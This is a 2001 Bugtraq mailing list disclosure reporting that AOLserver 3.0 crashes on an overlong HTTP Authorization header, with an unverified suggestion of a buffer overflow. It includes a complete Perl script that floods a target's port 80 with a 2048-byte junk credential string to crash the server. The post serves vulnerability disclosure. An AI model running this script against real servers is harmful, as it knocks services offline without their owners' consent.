Bugtraq mailing list archives
AOLserver 3.0 vulnerability
From: Nate Haggard <nate () securitylogics com>
Date: Wed, 22 Aug 2001 16:51:45 -0600
Aolserver 3.0 will crash when it is given a long authorization string. It is also possible this vulnerability will allow a hacker to execute arbitrary code through a buffer overflow. I have not verified a buffer overflow exists. Aolserver 3.4 and 3.3.1 are not vulnerable to this attack.
Here is a sample exploit: ------------------------------------------ #!/usr/bin/perl use IO::Socket; unless (@ARGV == 1) { die "usage: $0 host ..." } $host = shift(@ARGV); $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "http(80)", ); unless ($remote) { die "cannot connect to http daemon on $host" } $junk = "X" x 2048; $killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n"; $remote->autoflush(1); print $remote $killme; close $remote; -------------------- Nate HaggardSecurityLogics.com
Current thread:
- AOLserver 3.0 vulnerability Nate Haggard (Aug 22)
- Re: AOLserver 3.0 vulnerability KF (Aug 23)
- AOLserver 3.0 vulnerability Bob Rogers (Aug 23)